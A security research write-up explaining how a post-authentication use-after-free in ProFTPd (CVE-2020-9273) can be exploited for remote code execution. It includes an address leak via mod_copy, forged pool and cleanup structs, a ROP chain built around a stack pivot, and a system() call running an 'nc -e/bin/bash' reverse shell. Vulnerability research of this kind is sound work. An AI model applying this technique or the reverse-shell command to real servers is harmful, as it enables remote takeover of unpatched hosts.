Having fun with a Use-After-Free in ProFTPd (CVE-2020-9273)
Dear Fellowlship, today’s homily is about building a PoC for a Use-After-Free vulnerability in ProFTPd that can be triggered once authenticated and can lead to post-auth Remote Code Execution. Please, take a seat and listen to the story.
Introduction
This post analyzes the vulnerability and how to exploit it while bypassing all the memory exploit mitigations enabled by default (ASLR, PIE, NX, Full RELRO, stack canaries, etc.).
First of all I want to mention:
- @DUKPT_, who is also working on a PoC for this vulnerability, for his approach of overwriting gid_tab->pool, which is the one I decided to use in the exploit (it is explained later in this post)
- Antonio Morales (@nosoynadiemas), for discovering this vulnerability; you can find more information about how he discovered it in his post Fuzzing sockets, part 1: FTP servers
Vulnerability
To trigger the vulnerability, we first need to start a new data channel transfer, then interrupt it through the command channel while the data channel is still open.
Using the data channel, we can fill heap memory to overwrite the resp_pool struct, which is session.curr_cmd_rec->pool at this time.
The result of triggering the vulnerability successfully is full control over resp_pool:
gef➤ p p
$3 = (struct pool_rec *) 0x555555708220
gef➤ p resp_pool
$4 = (pool *) 0x555555708220
gef➤ p session.curr_cmd_rec->pool
$5 = (struct pool_rec *) 0x555555708220
gef➤ p *resp_pool
$6 = {
first = 0x4141414141414141,
last = 0x4141414141414141,
cleanups = 0x4141414141414141,
sub_pools = 0x4141414141414141,
sub_next = 0x4141414141414141,
sub_prev = 0x4141414141414141,
parent = 0x4141414141414141,
free_first_avail = 0x4141414141414141 <error: Cannot access memory at address 0x4141414141414141>,
tag = 0x4141414141414141 <error: Cannot access memory at address 0x4141414141414141>
}
Obviously, as there are no valid pointers in the struct, we end up with a segmentation fault on this line of code:
first_avail = blok->h.first_avail
Here blok, which coincides with the p->last value, is 0x4141414141414141 at that time.
The ProFTPd Pool Allocator
The ProFTPd pool allocator is the same as Apache's.
Allocations here take place using palloc() and pcalloc(), which are wrapper functions for alloc_pool().
The ProFTPd pool allocator works with blocks, which are actual glibc heap chunks.
Each block has a block_hdr header structure that defines it:
union block_hdr {
union align a;
/* Padding */
#if defined(_LP64) || defined(__LP64__)
char pad[32];
#endif
/* Actual header */
struct {
void *endp;
union block_hdr *next;
void *first_avail;
} h;
};
- blok->h.endp points to the end of the current block
- blok->h.next points to the next block in a linked list
- blok->h.first_avail points to the first available memory within this block
This is the alloc_pool() code:
static void *alloc_pool(struct pool_rec *p, size_t reqsz, int exact) {
size_t nclicks = 1 + ((reqsz - 1) / CLICK_SZ);
size_t sz = nclicks * CLICK_SZ;
union block_hdr *blok;
char *first_avail, *new_first_avail;
blok = p->last;
if (blok == NULL) {
errno = EINVAL;
return NULL;
}
first_avail = blok->h.first_avail;
if (reqsz == 0) {
errno = EINVAL;
return NULL;
}
new_first_avail = first_avail + sz;
if (new_first_avail <= (char *) blok->h.endp) {
blok->h.first_avail = new_first_avail;
return (void *) first_avail;
}
pr_alarms_block();
blok = new_block(sz, exact);
p->last->h.next = blok;
p->last = blok;
first_avail = blok->h.first_avail;
blok->h.first_avail = sz + (char *) blok->h.first_avail;
pr_alarms_unblock();
return (void *) first_avail;
}
As we can see, it first tries to use memory within the same block; if there is no space, it allocates a new block with new_block() and updates the pool's last block in p->last.
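The fast path above is a plain bump allocation. The following is a minimal sketch of it, assuming a click size of 8 bytes (the real CLICK_SZ is defined in ProFTPd's pool.c and is not shown in this post). The names model_blok, model_round and model_alloc are hypothetical and exist only for illustration:

```c
#include <assert.h>
#include <stddef.h>

/* Assumed alignment unit; the real CLICK_SZ is defined in ProFTPd's pool.c. */
#define MODEL_CLICK_SZ 8u

/* Hypothetical, simplified stand-in for the h member of union block_hdr. */
struct model_blok {
  char *endp;        /* end of the block */
  char *first_avail; /* first free byte inside the block */
};

/* Same rounding as alloc_pool(): round reqsz up to a whole number of clicks. */
size_t model_round(size_t reqsz) {
  assert(reqsz > 0);
  return (1 + ((reqsz - 1) / MODEL_CLICK_SZ)) * MODEL_CLICK_SZ;
}

/* Fast path only: returns NULL where alloc_pool() would call new_block(). */
void *model_alloc(struct model_blok *blok, size_t reqsz) {
  size_t sz = model_round(reqsz);
  char *first_avail = blok->first_avail;

  /* Equivalent to first_avail + sz <= endp, without forming an
   * out-of-bounds pointer in this model. */
  if (sz <= (size_t) (blok->endp - first_avail)) {
    blok->first_avail = first_avail + sz;
    return first_avail;
  }
  return NULL;
}
```

The point to keep in mind for later is that the returned address is simply whatever first_avail held before the call, so whoever controls the block header controls where the next allocation lands.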
Pool headers, defined by the pool_rec structure, are stored at the start of the first block created for that pool, right after its block_hdr header, as we can see in make_sub_pool(), which creates a new pool:
struct pool_rec *make_sub_pool(struct pool_rec *p) {
union block_hdr *blok;
pool *new_pool;
pr_alarms_block();
blok = new_block(0, FALSE);
new_pool = (pool *) blok->h.first_avail;
blok->h.first_avail = POOL_HDR_BYTES + (char *) blok->h.first_avail;
memset(new_pool, 0, sizeof(struct pool_rec));
new_pool->free_first_avail = blok->h.first_avail;
new_pool->first = new_pool->last = blok;
if (p) {
new_pool->parent = p;
new_pool->sub_next = p->sub_pools;
if (new_pool->sub_next)
new_pool->sub_next->sub_prev = new_pool;
p->sub_pools = new_pool;
}
pr_alarms_unblock();
return new_pool;
}
Actually, make_sub_pool() is responsible for creating the permanent pool as well, which has no parent; p will be NULL in that case.
Looking at the make_sub_pool() code, you can see that it gets a new block and, just after the block_hdr header, the pool_rec header is placed and blok->h.first_avail is updated to point right after it.
Then, the entries of the newly created pool are initialized.
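To make that layout concrete, here is a small sketch that carves a pool header out of the first bytes of a freshly allocated block. The types model_hdr and model_pool are hypothetical, trimmed-down stand-ins for block_hdr and pool_rec, and malloc() stands in for new_block():

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical, trimmed-down versions of block_hdr and pool_rec. */
struct model_hdr {
  char *endp;
  struct model_hdr *next;
  char *first_avail;
};

struct model_pool {
  struct model_hdr *first;
  struct model_hdr *last;
  char *free_first_avail;
};

/* Allocate one block and place the pool header right after the block header. */
struct model_pool *model_make_pool(size_t payload) {
  size_t total = sizeof(struct model_hdr) + sizeof(struct model_pool) + payload;
  struct model_hdr *blok = malloc(total);
  struct model_pool *p;

  if (blok == NULL) {
    return NULL;
  }
  blok->endp = (char *) blok + total;
  blok->next = NULL;
  blok->first_avail = (char *) (blok + 1);        /* right after the block header */

  p = (struct model_pool *) blok->first_avail;
  blok->first_avail += sizeof(struct model_pool); /* skip the pool header */

  memset(p, 0, sizeof(*p));
  p->free_first_avail = blok->first_avail;
  p->first = p->last = blok;
  return p;
}
```

In this model the pool header lives inside the heap chunk it manages, which is why filling heap memory from the data channel can end up overwriting a pool_rec.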
The p->cleanups entry is a pointer to a cleanup_t struct:
typedef struct cleanup {
void *data;
void (*plain_cleanup_cb)(void *);
void (*child_cleanup_cb)(void *);
struct cleanup *next;
} cleanup_t;
Cleanups are run by the function run_cleanups() and registered with the function register_cleanup().
A chain of blocks can be freed using free_blocks():
static void free_blocks(union block_hdr *blok, const char *pool_tag) {
union block_hdr *old_free_list = block_freelist;
if (!blok)
return;
block_freelist = blok;
while (blok->h.next) {
chk_on_blk_list(blok, old_free_list, pool_tag);
blok->h.first_avail = (char *) (blok + 1);
blok = blok->h.next;
}
chk_on_blk_list(blok, old_free_list, pool_tag);
blok->h.first_avail = (char *) (blok + 1);
blok->h.next = old_free_list;
}
Exploitation Analysis
We have control over a really interesting pool_rec struct. Now we need to search for primitives that let us get something useful out of this vulnerability, such as Remote Code Execution.
Leaking memory addresses
Obviously, exploiting this vulnerability requires predictable memory addresses before using any primitive, as in this case the exploitation consists of playing with pointers, structs and memory writes.
Leaking memory addresses in this situation is really hard, as we are in a cleanup/session-finishing process, and to trigger the vulnerability we actually need to generate an interruption.
I first thought about reading the /proc/self/maps file, which any process can read, even with low privileges.
In theory this would work; unfortunately, ProFTPd uses the stat syscall to retrieve the file size. As stat on pseudo-files like maps returns a size of zero, this breaks the transfer, and 0 bytes are returned to the client on the data channel.
Thinking about additional ways to do it, I came across mod_copy, a ProFTPd module that allows you to copy files within the server.
We can use mod_copy to copy /proc/self/maps to /tmp and, once there, perform a normal transfer of the copy in /tmp, which is no longer a pseudo-file, so the content of /proc/self/maps is returned to the attacker.
This leak is really interesting, as it gives you the addresses of every segment and even the filenames of the shared libraries, which sometimes contain versions, like libc-2.31.so. This helps exploit reliability, as we can use offsets for specific libc versions.
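Once the copy has been downloaded, each line has to be split into its address range, permissions and path. The following is a minimal sketch of such a parser, assuming the usual "start-end perms offset dev inode path" layout of the maps file; the struct and function names are hypothetical and the libc check is only a filename heuristic:

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* One parsed line of a maps file. */
struct maps_entry {
  unsigned long long start;
  unsigned long long end;
  char perms[5];
  char path[256];
};

/* Parses "start-end perms offset dev inode [path]"; returns 1 on success. */
int parse_maps_line(const char *line, struct maps_entry *out) {
  unsigned long long offset;
  unsigned long long inode;
  char dev[16];
  int n;

  assert(line != NULL && out != NULL);
  out->path[0] = '\0'; /* anonymous mappings have no path */
  n = sscanf(line, "%llx-%llx %4s %llx %15s %llu %255[^\n]",
             &out->start, &out->end, out->perms, &offset, dev, &inode,
             out->path);
  return n >= 6;
}

/* True if the mapping's path looks like a libc image, e.g. libc-2.31.so. */
int maps_entry_is_libc(const struct maps_entry *e) {
  return strstr(e->path, "/libc-") != NULL ||
         strstr(e->path, "/libc.so") != NULL;
}
```

The lowest start address among the entries that match a given path is the load base of that image, which is the value the libc-specific offsets get added to.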
Hijacking the control-flow
We have to transform our control over session.curr_cmd_rec->pool into a write primitive that lets us reach run_cleanups() with an arbitrary cleanup_t struct.
Looking for struct entry writes, there was nothing useful that would give us a direct write-what-where primitive (that would have been a lot easier).
Instead, the only way to write something to an arbitrary address is to use make_sub_pool() (at pool.c:415), which is called with cmd->pool as argument at some point:
struct pool_rec *make_sub_pool(struct pool_rec *p) {
union block_hdr *blok;
pool *new_pool;
pr_alarms_block();
blok = new_block(0, FALSE);
new_pool = (pool *) blok->h.first_avail;
blok->h.first_avail = POOL_HDR_BYTES + (char *) blok->h.first_avail;
memset(new_pool, 0, sizeof(struct pool_rec));
new_pool->free_first_avail = blok->h.first_avail;
new_pool->first = new_pool->last = blok;
if (p) {
new_pool->parent = p;
new_pool->sub_next = p->sub_pools;
if (new_pool->sub_next)
new_pool->sub_next->sub_prev = new_pool;
p->sub_pools = new_pool;
}
pr_alarms_unblock();
return new_pool;
}
This function is called at main.c:287 from the _dispatch() function with our controlled pool as argument:
...
if (cmd->tmp_pool == NULL) {
cmd->tmp_pool = make_sub_pool(cmd->pool);
pr_pool_tag(cmd->tmp_pool, "cmd_rec tmp pool");
}
...
As you can see, new_pool->sub_next now has the value of p->sub_pools, which is controlled; then the new_pool pointer is written to new_pool->sub_next->sub_prev.
This means we can write the value of new_pool to an arbitrary address. This does not appear to be very useful on its own, as the only relationship we have with this newly created pool, cmd->tmp_pool, is that cmd->tmp_pool->parent is equal to resp_pool, since our pool is its parent.
Also, the only value we control is new_pool->sub_next, which we actually use for the write primitive.
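The write can be reproduced in isolation with a harmless model. In this sketch link_pool keeps only the linkage fields of pool_rec, model_link() repeats the linking step of make_sub_pool(), and model_sibling_for_slot() is a hypothetical helper that computes which value p->sub_pools needs so that the sub_prev field overlaps a chosen pointer-sized slot:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for pool_rec with only the linkage fields. */
struct link_pool {
  struct link_pool *sub_pools;
  struct link_pool *sub_next;
  struct link_pool *sub_prev;
  struct link_pool *parent;
};

/* Address to store in p->sub_pools so that the sub_prev field of the
 * "sibling" overlaps the pointer-sized slot that should be overwritten. */
struct link_pool *model_sibling_for_slot(struct link_pool **slot) {
  assert(slot != NULL);
  return (struct link_pool *)
      ((char *) slot - offsetof(struct link_pool, sub_prev));
}

/* The linking step of make_sub_pool(), unchanged in logic. */
void model_link(struct link_pool *new_pool, struct link_pool *p) {
  memset(new_pool, 0, sizeof(*new_pool));
  if (p) {
    new_pool->parent = p;
    new_pool->sub_next = p->sub_pools;
    if (new_pool->sub_next)
      new_pool->sub_next->sub_prev = new_pool; /* the pointer write */
    p->sub_pools = new_pool;
  }
}
```

The written value is always the address of the new pool, never attacker-chosen data, which is the limitation described above.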
What more interesting primitives do we have?
In a previous section we explained how the ProFTPd pool allocator works. When a new pool is created, p->first and p->last point to the blocks used for the pool. We are interested in p->last, as it is the block that is actually used for allocation, as we can see in alloc_pool() at pool.c:570:
...
blok = p->last;
if (blok == NULL) {
errno = EINVAL;
return NULL;
}
first_avail = blok->h.first_avail;
...
first_avail is the pointer to the boundary between used data and available free space, which is where the next allocation will start.
Our pool is passed to pstrdup() multiple times for string allocation:
char *pstrdup(pool *p, const char *str) {
char *res;
size_t len;
if (p == NULL ||
str == NULL) {
errno = EINVAL;
return NULL;
}
len = strlen(str) + 1;
res = palloc(p, len);
if (res != NULL) {
sstrncpy(res, str, len);
}
return res;
}
This function calls palloc(), which ends up calling alloc_pool().
The allocations are mostly non-controllable strings, which do not seem useful to us, except for one allocation at cmd.c:373 in the function pr_cmd_get_displayable_str():
...
if (pr_table_add(cmd->notes, pstrdup(cmd->pool, "displayable-str"),
pstrdup(cmd->pool, res), 0) < 0) {
if (errno != EEXIST) {
pr_trace_msg(trace_channel, 4,
"error setting 'displayable-str' command note: %s", strerror(errno));
}
}
...
As you can see, cmd->pool (our controlled pool) is passed to pstrdup(), and as seen at cmd.c:363:
...
if (argc > 0) {
register unsigned int i;
res = pstrcat(p, res, pr_fs_decode_path(p, argv[0]), NULL);
for (i = 1; i < argc; i++) {
res = pstrcat(p, res, " ", pr_fs_decode_path(p, argv[i]), NULL);
}
}
...
res points to the last command we sent, which is then duplicated into our pool:
...
if (pr_table_add(cmd->notes, pstrdup(cmd->pool, "displayable-str"),
pstrdup(cmd->pool, res), 0) < 0) {
if (errno != EEXIST) {
pr_trace_msg(trace_channel, 4,
"error setting 'displayable-str' command note: %s", strerror(errno));
}
}
...
This means that if we send arbitrary data instead of a command, we can place custom data in the pool block space. As we can corrupt p->last, we can make blok->h.first_avail point to any address we want, which means we can overwrite any data through a command.
Unfortunately, this is not like our corruption from the data channel, as here our commands are treated as strings and not as binary data like on the data channel.
This means we are very limited when overwriting structs or any other useful data.
Also, some allocations happen earlier, so the heap between the initial value of blok->h.first_avail and its value when our command is pstrdup()'ed will be full of strings and non-valid pointers, which could well cause a crash before reaching run_cleanups().
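The string limitation can be quantified with a short sketch. The hypothetical helper below counts how many bytes of a 64-bit value survive a strlen()-based copy such as the one pstrdup() performs; it assumes a little-endian host, as on x86-64:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Number of bytes of a 64-bit value that a strlen()-based copy would carry
 * over before hitting a NUL byte. */
size_t model_string_bytes(uint64_t value) {
  const uint16_t probe = 1;
  char raw[sizeof(value) + 1];

  /* This sketch assumes a little-endian host such as x86-64. */
  assert(*(const unsigned char *) &probe == 1);

  memcpy(raw, &value, sizeof(value));
  raw[sizeof(value)] = '\0';
  return strlen(raw);
}
```

A user-space pointer such as 0x0000563f5c9a62d0 has its two top bytes set to zero, so only the six low bytes are copied, followed by a single terminator. One pointer at the very end of the command can therefore be written, but a structure with several pointers or embedded NULL fields cannot be sent this way.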
Initially, I decided to use blok->h.first_avail to overwrite cmd->tmp_pool entries with arbitrary data.
This pool is freed with destroy_pool() at main.c:409 in the function _dispatch():
...
destroy_pool(cmd->tmp_pool);
cmd->tmp_pool = NULL;
...
This means that if we control the cmd->tmp_pool->cleanups value when reaching clear_pool(), we have the ability to control RIP and RDI once run_cleanups() is called:
void destroy_pool(pool *p) {
if (p == NULL) {
return;
}
pr_alarms_block();
if (p->parent) {
if (p->parent->sub_pools == p) {
p->parent->sub_pools = p->sub_next;
}
if (p->sub_prev) {
p->sub_prev->sub_next = p->sub_next;
}
if (p->sub_next) {
p->sub_next->sub_prev = p->sub_prev;
}
}
clear_pool(p);
free_blocks(p->first, p->tag);
pr_alarms_unblock();
}
As you can see, clear_pool() is called, but only after accessing some entries of the pool, which must be either NULL or a valid writable address.
Once clear_pool() is called:
static void clear_pool(struct pool_rec *p) {
/* Sanity check. */
if (p == NULL) {
return;
}
pr_alarms_block();
run_cleanups(p->cleanups);
p->cleanups = NULL;
while (p->sub_pools) {
destroy_pool(p->sub_pools);
}
p->sub_pools = NULL;
free_blocks(p->first->h.next, p->tag);
p->first->h.next = NULL;
p->last = p->first;
p->first->h.first_avail = p->free_first_avail;
pr_alarms_unblock();
}
We can see that run_cleanups() is called directly, without further checks or memory writes.
This is the run_cleanups() function:
static void run_cleanups(cleanup_t *c) {
while (c) {
if (c->plain_cleanup_cb) {
(*c->plain_cleanup_cb)(c->data);
}
c = c->next;
}
}
Looking at the cleanup_t struct:
typedef struct cleanup {
void *data;
void (*plain_cleanup_cb)(void *);
void (*child_cleanup_cb)(void *);
struct cleanup *next;
} cleanup_t;
We can control RIP with c->plain_cleanup_cb and RDI with c->data.
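The reason these two fields map to those two registers is the calling convention: on x86-64 System V the first pointer argument is passed in RDI, and the indirect call loads the callback address into RIP. A harmless model of the same loop, using a hypothetical callback that only records its argument:

```c
#include <assert.h>
#include <stddef.h>

typedef struct model_cleanup {
  void *data;
  void (*plain_cleanup_cb)(void *);
  void (*child_cleanup_cb)(void *);
  struct model_cleanup *next;
} model_cleanup_t;

/* Same loop as run_cleanups(). */
void model_run_cleanups(model_cleanup_t *c) {
  while (c) {
    if (c->plain_cleanup_cb) {
      (*c->plain_cleanup_cb)(c->data); /* callee and argument both come from c */
    }
    c = c->next;
  }
}

/* Harmless callback that records the argument it was called with. */
static void *model_last_arg = NULL;

void model_record(void *data) {
  model_last_arg = data;
}

void *model_get_last_arg(void) {
  return model_last_arg;
}
```

Nothing in the loop validates where the record came from, so whoever supplies the cleanup_t record chooses both the function and its first argument.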
Unfortunately, corrupting cmd->tmp_pool is difficult, as the string displayable-str is appended right after our controllable data, and right after our p->cleanups entry there are some entries that are accessed in destroy_pool() before reaching run_cleanups().
@DUKPT_, who is also working on a PoC for this vulnerability, was overwriting gid_tab->pool instead. This is a more reliable technique, as there are no pointers after our controllable data, so nothing serious breaks when displayable-str is appended. Also, instead of corrupting a pool_rec structure we corrupt a pr_table_t structure, so we can point gid_tab->pool to memory corrupted from the data channel, which also accepts NULL bytes. There we can craft a fake pool_rec structure whose p->cleanups value points to a fake cleanup_t struct, which will finally be passed to run_cleanups().
What also makes gid_tab interesting is that gid_tab->pool is passed to destroy_pool() in pr_table_free(), which is called with gid_tab as argument:
int pr_table_free(pr_table_t *tab) {
if (tab == NULL) {
errno = EINVAL;
return -1;
}
if (tab->nents != 0) {
errno = EPERM;
return -1;
}
destroy_pool(tab->pool);
return 0;
}
This is what pr_table_t looks like:
struct table_rec {
pool *pool;
unsigned long flags;
unsigned int seed;
unsigned int nmaxents;
pr_table_entry_t **chains;
unsigned int nchains;
unsigned int nents;
pr_table_entry_t *free_ents;
pr_table_key_t *free_keys;
pr_table_entry_t *tab_iter_ent;
pr_table_entry_t *val_iter_ent;
pr_table_entry_t *cache_ent;
int (*keycmp)(const void *, size_t, const void *, size_t);
unsigned int (*keyhash)(const void *, size_t);
void (*entinsert)(pr_table_entry_t **, pr_table_entry_t *);
void (*entremove)(pr_table_entry_t **, pr_table_entry_t *);
};
...
typedef struct table_rec pr_table_t;
As you can see, the entries after tab->pool (tab->flags, tab->seed and tab->nmaxents) are not pointers, so the appended string will not trigger crashes.
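How much room those non-pointer entries provide can be checked with offsetof. The struct below copies only the leading fields of table_rec from the listing above (model_table and model_gap_after_pool are hypothetical names), and the result assumes a 64-bit Linux build:

```c
#include <assert.h>
#include <stddef.h>

/* Leading fields of struct table_rec as listed above; the rest is omitted. */
struct model_table {
  void *pool;
  unsigned long flags;
  unsigned int seed;
  unsigned int nmaxents;
  void **chains;
};

/* Bytes between the end of the pool pointer and the next pointer field. */
size_t model_gap_after_pool(void) {
  /* flags is expected to start right after the pool pointer. */
  assert(offsetof(struct model_table, flags) == sizeof(void *));
  return offsetof(struct model_table, chains)
       - offsetof(struct model_table, flags);
}
```

On such a build the gap is 16 bytes, and the string displayable-str including its terminator is also 16 bytes long. Whether the string lands exactly in that gap depends on the order and sizes of the surrounding allocations, which this sketch does not model.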
So, what is the plan?
1) Craft a fake block_hdr structure that will be pointed to by p->last
2) Set fake_blok->h.first_avail to a pointer to gid_tab minus some offset, where the offset depends on the number of allocations and their sizes, so that when pstrdup() copies our arbitrary command, fake_blok->h.first_avail is exactly the address of gid_tab and our address lands there
3) Set p->sub_next to the address of tab->chains, so that when pr_table_kget() is called NULL is returned, which makes our arbitrary command get allocated
4) Send a custom command containing a fake pr_table_t (actually only tab->pool is needed), and point fake_tab->pool to a fake pool_rec struct
5) Craft the fake pool_rec struct: point fake_pool->parent, fake_pool->sub_next and fake_pool->sub_prev to any writable address, and fake_pool->cleanups to a fake cleanup_t struct containing our arbitrary RIP and RDI values
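The offset in step 2 is just the sum of the rounded sizes of the allocations that happen before our command is copied. A sketch of that arithmetic, assuming an 8-byte click size; the function names are hypothetical, and the real allocation sizes have to be measured on the target build and are not given in this post:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MODEL_CLICK_SZ 8u /* assumed alignment unit */

/* Bytes consumed by one allocation after rounding up to whole clicks. */
static size_t click_round(size_t reqsz) {
  return (1 + ((reqsz - 1) / MODEL_CLICK_SZ)) * MODEL_CLICK_SZ;
}

/* Value first_avail must start at so that, after the listed allocations,
 * the next allocation is returned exactly at target. */
uint64_t model_start_for_target(uint64_t target, const size_t *sizes,
                                size_t count) {
  uint64_t consumed = 0;
  size_t i;

  for (i = 0; i < count; i++) {
    assert(sizes[i] > 0);
    consumed += click_round(sizes[i]);
  }
  return target - consumed;
}
```

The fast path in alloc_pool() is only taken while new_first_avail <= endp holds, so the endp value of the fake block also has to lie beyond the end of the last allocation.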
This is the result of exploiting the hijack technique:
*0x4242424242424242 (
$rdi = 0x4141414141414141,
$rsi = 0x0000000000000000,
$rdx = 0x4242424242424242,
$rcx = 0x0000555555579c00 → <entry_remove+0> endbr64
)
As you can see, c->plain_cleanup_cb has the value 0x4242424242424242 and c->data has the value 0x4141414141414141, which means RIP and RDI are fully controlled.
Getting RCE
As explained, our main target is reaching the run_cleanups() function with an arbitrary address, or with a non-arbitrary address whose content we control. This allows us to obtain full RIP and RDI control which, taking into account that we already have predictable addresses for every segment, means Remote Code Execution is likely possible.
Some ways to obtain Remote Code Execution:
Stack pivot, ROP and shellcode execution
As we control both RIP and RDI, we can search for useful gadgets that let us redirect the control flow into a ROP chain to bypass NX.
When reaching run_cleanups():
gef➤ p *c
$7 = {
data = 0x563593915280,
plain_cleanup_cb = 0x7f875ab201a1 <authnone_marshal+17>,
child_cleanup_cb = 0x4141414141414141,
next = 0x4242424242424242
}
gef➤ x/2i c->plain_cleanup_cb
0x7f875ab201a1 <authnone_marshal+17>: push rdi
0x7f875ab201a2 <authnone_marshal+18>: pop rsp
gef➤
When entering on the stack pivot gadget:
→ 0x7f875ab201a1 <authnone_marshal+17> push rdi
0x7f875ab201a2 <authnone_marshal+18> pop rsp
0x7f875ab201a3 <authnone_marshal+19> lea rsi, [rdi+0x48]
0x7f875ab201a7 <authnone_marshal+23> mov rdi, r8
0x7f875ab201aa <authnone_marshal+26> mov rax, QWORD PTR [rax+0x18]
0x7f875ab201ae <authnone_marshal+30> jmp rax
We previously crafted our resp_pool struct so that rax + 0x18 is the location where the address of a ret instruction is stored. So when:
mov rax, QWORD PTR [rax+0x18]
is executed, rax receives that address, which is used by the very next instruction: jmp rax.
As it points to a ret instruction, we finally execute our ROP chain, since we pointed rsp right at the start of our ROP chain and a ret instruction just got executed.
gef➤ p $rax
$5 = 0x563593915358
gef➤ x/gx $rax + 0x18
0x563593915370: 0x00007f875a9fc679
gef➤ x/i 0x00007f875a9fc679
0x7f875a9fc679 <__libgcc_s_init+61>: ret
At the time of jmp rax:
0x7f875ab201a3 <authnone_marshal+19> lea rsi, [rdi+0x48]
0x7f875ab201a7 <authnone_marshal+23> mov rdi, r8
0x7f875ab201aa <authnone_marshal+26> mov rax, QWORD PTR [rax+0x18]
→ 0x7f875ab201ae <authnone_marshal+30> jmp rax
0x7f875ab201b0 <authnone_marshal+32> xor eax, eax
0x7f875ab201b2 <authnone_marshal+34> ret
--------------------------------------------------------------
gef➤ p $rax
$6 = 0x7f875a9fc679
gef➤ x/i $rax
0x7f875a9fc679 <__libgcc_s_init+61>: ret
And we can see stack was pivoted successfully:
gef➤ p $rsp
$7 = (void *) 0x563593915358
gef➤ x/gx 0x563593915358
0x563593915358: 0x00007f875aa21550
gef➤ x/i 0x00007f875aa21550
0x7f875aa21550 <mblen+112>: pop rax
The ROP chain sets up a SYS_mprotect syscall, which changes the memory protection of a heap range to RWX. Then we jump into the shellcode, finally achieving Remote Code Execution.
If we check the mappings with gdb, we can see that part of the heap is now RWX, which is actually where the shellcode resides:
0x0000563593889000 0x00005635938cb000 0x0000000000000000 rw- [heap]
0x00005635938cb000 0x0000563593915000 0x0000000000000000 rw- [heap]
0x0000563593915000 0x0000563593916000 0x0000000000000000 rwx [heap]
0x0000563593916000 0x000056359394e000 0x0000000000000000 rw- [heap]
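Only one page changed because mprotect() works on whole pages and requires a page-aligned start address. The following sketch shows the rounding involved, assuming 4096-byte pages (which matches the size of the rwx mapping above); the function names are hypothetical:

```c
#include <assert.h>
#include <stdint.h>

/* Round an address down to the start of its page.
 * page_size must be a power of two. */
uint64_t model_page_base(uint64_t addr, uint64_t page_size) {
  assert(page_size != 0 && (page_size & (page_size - 1)) == 0);
  return addr & ~(page_size - 1);
}

/* Number of bytes, in whole pages, needed to cover [addr, addr + len). */
uint64_t model_page_span(uint64_t addr, uint64_t len, uint64_t page_size) {
  uint64_t base = model_page_base(addr, page_size);
  uint64_t end = addr + len;
  uint64_t pages = (end - base + page_size - 1) / page_size;

  return pages * page_size;
}
```

For the shellcode address seen in the next listing, 0x563593915310, the page base is 0x563593915000, which is the start of the rwx mapping shown above.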
Now we jump to the shellcode, which resides in executable memory, so Remote Code Execution succeeds:
0x7f875aa3d229 <funlockfile+73> syscall
→ 0x7f875aa3d22b <funlockfile+75> ret
↳ 0x563593915310 push 0x29
0x563593915312 pop rax
0x563593915313 push 0x2
0x563593915315 pop rdi
0x563593915316 push 0x1
0x563593915318 pop rsi
Chaining all this together into an exploit, this is a screenshot of the successful exploitation of this vulnerability using the ROP approach:
ret2libc or ret2X
You can jump to any function and control one argument, which means you can call any function with an arbitrary first argument. You can reuse register values for other arguments as well, but then you rely on the current registers being valid for the target function, e.g. an invalid pointer would trigger a crash.
The approach I followed with this method is calling system() and pointing RDI to a custom command string (a netcat reverse shell) that I leave in the heap at a predictable address.
First we reach destroy_pool() with the fake pool_rec struct; we actually reuse entries from our initially controlled struct:
gef➤ p *p
$1 = {
first = 0x563f5c9c6280,
last = 0x7361626174614472,
cleanups = 0x563f5c9a62d0,
sub_pools = 0x563f5c9a6298,
sub_next = 0x563f5c9a62a0,
sub_prev = 0x563f5c9a0a90,
parent = 0x563f5c94a738,
free_first_avail = 0x563f5c94a7e0 "\260\251\224\\?V",
tag = 0x563f5c9a526e ""
}
gef➤ p *resp_pool
$2 = {
first = 0x563f5c9a62d0,
last = 0x563f5c9a6298,
cleanups = 0x563f5c9a62a0,
sub_pools = 0x563f5c9a0a90,
sub_next = 0x563f5c94a738,
sub_prev = 0x563f5c94a7e0,
parent = 0x563f5c9a526e,
free_first_avail = 0x563f5c9a526e "",
tag = 0x563f5c9a526e ""
}
Then destroy_pool() calls clear_pool(), which finally ends up calling run_cleanups() with our fake cleanup_t struct, pointed to by p->cleanups:
gef➤ p *c
$3 = {
data = 0x563f5c9a62f0,
plain_cleanup_cb = 0x7fca503f1410 <__libc_system>,
child_cleanup_cb = 0x4141414141414141,
next = 0x4242424242424242
}
gef➤ x/s c->data
0x563f5c9a62f0: "nc -e/bin/bash 127.0.0.1 4444"
As we can see, c->plain_cleanup_cb (the future RIP) points to __libc_system(), and c->data points to our command string stored in the heap.
If we continue, the result is the execution of a new process as part of the command execution: process 35209 is executing new program: /usr/bin/ncat
Finally, we obtain a reverse shell as the user we logged in with on the FTP server.
An RCE video demo is also available on GitHub (same directory where the exploit resides).
Patch
You can find the GitHub issue and patches for this vulnerability here.
Conclusion
In this post we analyzed and demonstrated the exploitation of a Use-After-Free in ProFTPd, and achieved full Remote Code Execution even with all the protections turned on (ASLR, PIE, NX, RELRO, STACKGUARD, etc.).
Although authentication is needed, an attacker is sometimes in exactly that situation and cannot go any further without an RCE exploit like this.
You can find the ROP approach exploit here.
You can find the other exploit, using system() and netcat, here.
EoF
We hope you enjoyed this reading! Feel free to give us feedback on our Twitter @AdeptsOf0xCC.